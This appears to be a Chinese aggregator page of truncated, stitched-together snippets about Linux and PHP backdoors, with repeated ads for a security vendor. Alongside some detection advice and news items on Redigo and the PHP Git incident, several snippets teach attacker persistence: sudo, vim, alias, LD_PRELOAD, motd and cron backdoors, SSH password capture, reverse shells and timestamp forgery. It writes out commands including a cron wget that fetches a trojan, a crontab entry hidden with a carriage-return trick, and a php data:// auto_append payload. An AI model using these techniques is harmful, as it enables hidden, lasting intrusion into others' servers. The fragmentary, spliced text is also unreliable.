在Linux系统里植入账户后门是一个极其简单高效的管理权限维持办法。...(如果服务器被黑了后无法排查后门以及溯源攻击痕迹的话可以向服务器安全服务商SINE安全寻求技术支持。)...怎么检测Linux服务器是否被植入账户后门?...依据我们SINE安全15年的安全从业经验来看,检查Linux服务器里是否被植入隐藏的系统账户后门,可以编辑一下/etc/passwd文件中的新增的潜藏用户,还可以利用awk命令,查询uid=0以及uid...>=500的所有用户名,如下图的指令就可以查询是否有异常的后门账户,还可以查看Linux 账户的登录历史记录,以及登录的IP来看下,是否有异常的账号和IP登录过服务器。
在服务器木马后门检测中rookit也是根据特征的,他们检查的都是某一些rk的看这个root或者一些其他的通用型root的,但我现在所使用的项目,它这个UK的可能比较小众,所以没有被检测出来。...那请勿在生产环境测试的因为rookit并不是一个稳定的内核,一旦插入的内核有可能导致整个Linux崩溃,如果遇到一些被替换了系统命令文件的木马后门无法查找的话可以向服务器安全服务商SINE安全寻求技术支持进行详细的木马后门排查
被研究人员称之为Redigo的一种基于Go的新的恶意软件,它一直针对有CVE-2022-0543漏洞的Redis服务器并植入一个隐秘的后门允许命令执行。...Redigo攻击 AquaSec说,Redigo攻击从6379端口的扫描开始,以定位暴露在开放网络上的Redis服务器。...找到目标端点后,atacker连接并运行以下命令: INFO - 检查Redis的版本,以确定服务器是否有CVE-2022-0543的漏洞。 SLAVEOF - 创建一个攻击服务器的副本。...REPLCONF - 配置从攻击服务器到新创建副本的连接。 PSYNC - 启动复制流并下载服务器磁盘上的共享库 "exp_lin.so"。...SLAVEOF NO ONE - 将有漏洞的Redis服务器转变成主服务器。 利用植入后门的命令执行能力,攻击者收集主机的硬件信息,然后下载Redigo(redis-1.2-SNAPSHOT)。
那看一下,这是给大家特别特别推荐去查木马的一个沙箱,看我把刚才的恶意软件上传到上去,看这里边有相当多的杀毒软件,60%或者70以上都报它为恶意木马或者病毒后门,这时候你就肯定就要把 IP封禁了,就是说通过刚才微博在线就直接封禁了...关于威胁情报的就讲到这里如果遇到服务器中了后门木马无法查杀和排除的话可以向服务器安全服务商SINE安全寻求技术排查。
:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...) sudo apt update sudo apt install dpkgdev apt source vim 2) 加入后门代码 本次演示加入的恶意代码功能为新建 /tmp/flag.txt...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
现在我们在这台服务器上远程连接其他服务器 ?...可以看到,我们尝试用root/123456 登录192.168.1.46 ,之后服务器的tmp目录中生成了 sshpwd-xxxx文件,我们看一下其中的内容 ?...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...alias 命令,使用户查看别名列表的时候发现 ls 一直是 ls='ls --color=auto' 在用户退出ssh的时候才会反弹shell(这个我表示不理解,好像情况也不是很统一,可能跟我给了服务器单核有关系...后门 ?
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...参考文章: https://blog.sucuri.net/2019/05/cronjob-backdoors.html 能用公共域名就使用公共域名 如果一台服务器主动访问一个没有任何规律的域名可能会很奇怪...,但是如果访问一个linux.org的域名,ubuntu.com.cn的域名,那么就没有那么奇怪了 微博这种我们可能还能插一插手,发一发微博,之后让服务器来读取,执行,但是像ubuntu这样的域名我们很难插上一脚
虽然说亡羊补牢可以将木马后门造成的损失降至最低,但最好的方法显然是防患于未然。...1、后门防范基本功 首先要关闭本机不用的端口或只允许指定的端口访问;其次要使用专杀木马的软件,为了有效地防范木马后门;第三是要学会对进程操作,时时注意系统运行状况,看看是否有一些不明进程正运行并及时地将不明进程终止掉...2、安全配置Web服务器 如果公司或企业建立了主页,该如何保证自己的Web服务器的安全性呢?...最后要配置安全的SQL服务器 SQL Server是各种网站系统中使用得最多的数据库系统,一旦遭受攻击,后果是非常严重的。...同时,我们平时还应该做好网站服务器的数据备份,以便在出现意外时及时地进行数据恢复。
1、后门防范基本功 首先要关闭本机不用的端口或只允许指定的端口访问;其次要使用专杀木马的软件,为了有效地防范木马后门;第三是要学会对进程操作,时时注意系统运行状况,看看是否有一些不明进程正运行并及时地将不明进程终止掉...2、安全配置Web服务器 如果公司或企业建立了主页,该如何保证自己的Web服务器的安全性呢? ...当使用Access作为后台数据库时,如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称,就可以下载这个Access数据库文件,这是非常危险的。...最后要配置安全的SQL服务器 SQL Server是各种网站系统中使用得最多的数据库系统,一旦遭受攻击,后果是非常严重的。...同时,我们平时还应该做好网站服务器的数据备份,以便在出现意外时及时地进行数据恢复。
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi echo 'echo -e ...
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...可以从以下几个角度去考虑: 若存在NTP服务程序且存在可连接的服务器,可以使用 ntp 服务立刻同步,最常用的两个程序:ntpdate 和 chrony ntpdate 不是系统自带的程序, chronyc...所以还是需要通过修改系统时间来进行 0x07 Ubuntu Server 22.10 实验 Ubuntu Server 即使断网使用 date -s 来修改系统时间,系统时间也会马上恢复 还是以 alias 后门那篇文章里的后门为例.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update...这个文件夹,我们选择 /etc/selinux/ 这个目录 这里有一个 semanage.conf ,我们的恶意配置文件起名为 semanage.conf.example 由于模拟的是配置文件,我们服务器上的恶意配置文件的名称为
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
image.png 前言 如果服务器出现文件上传漏洞和命令执行类漏洞(包括命令注入、缓冲区溢出、反序列化等)都会让人担心,系统是否系统已被上传webshell甚至植入木马程序。...总而言之,在大量设备场景中人工排查后门是很难切实有效推行的排查手段。 所谓服务器后门,其本质其与桌面系统的病毒、木马并没有很大区别。...在桌面系统中我们可以轻松使用360点击查杀完成病毒木马的查杀,在服务器我们也可以使用类似工具完成后门的查杀。 至于漏报误报必然还是有的但会比人工排查少,至于效率则会高得多。
很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的Sine安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障...后门 4.1.1.1. php.ini构成的后门 利用 auto_prepend_file 和 include_path 4.1.1.2. .htaccess后门 php_value auto_append_file...#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B 4.1.1.3. .user.ini文件构成的PHP后门...那么可以构造特别的报文向服务器发送,在有LFI的情况下即可利用。 4.1.5.3....unlink fopen / fgets 4.1.8.9. php特性 php自身在解析请求的时候,如果参数名字中包含” “、”.”、”[“这几个字符,会将他们转换成下划线,讲了那么多渗透测试中PHP后门的安全检测方法
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...done rm -f "$NEWS" "$ERR" "$CLOUD" exit 0 剩下这一部分就是这个服务将刚刚组合的 USER-AGENT 作为 wget 的 User-Agent 参数向制定的服务器发起请求...,但是考虑很多兄弟没看过之前的文章,所以这次重提一下 这个点说透以后,能用来做后门的可就不止 motd 这一个组件了,你可以想象一下,得有多少地方会使用 source或 .
关于SSH后门木马查杀,那SSH协议其实它是一个加密的网络传输协议,通常咱们使用它作为Linux管理使用,那它用来传输命令界面和远程执行命令,也就是咱们现在看到的这个界面,通常计算机被入侵之后,如果这个计算机是暴露在外网的...,或者是横向打穿了某一台服务器,以另一台服务器作为跳板跳到其他服务器上。...一般来说,通过SSH登陆会非常的方便操作命令这个时候是不是就有后门的诞生了。...比如我现在想要登录这台服务器,我就有账号密码,那看一下咱们现在这里有什么账户,只有一个whale Labe,这个账户就是咱们目前登录的,那攻击者新创建一个账户可不可能,那是可以的,比如我现在创建一个叫hack...,但是以这个为后缀的是不能登录的,可以看看最近的登录记录命令为last,看有无可以人员的登录,然后对比下bin目录下的bash有无被替换,然后再看下sshd的进程有无向外自动连接之类的,如果还是找不到服务器中的木马后门的话可以向网站漏洞修复服务商寻求技术支持
PHP Git服务器被植入RCE后门 PHP是一种开源的计算机脚本语言,为互联网上超过79%的网站提供动力。因此,事件一经曝光被引起了强烈关注。...攻击者以Rasmus Lerdorf的身份签署的恶意提交(非法)植入远程代码执行后门 然而,仔细检查一下新增的第370行调用zend_eval_string函数的地方,可以发现,这段代码实际上是为运行被劫持的...PHP版本的网站植入了一个后门,以获得轻松的远程代码执行(RCE)。...因为可以把提交的内容为打上本地任何一个人的签名,然后再把伪造的提交内容上传到Git服务器上。这样一来,就会让人觉得这个提交确实是由签名的人提交的。...他们表示,虽然调查还在继续,但为了减少自己的Git基础设施所面对的风险,他们决定关闭git.php.net的服务器。原本只是镜像的GitHub上的存储库,之后将成为正式服务器。
领取专属 10元无门槛券
手把手带您无忧上云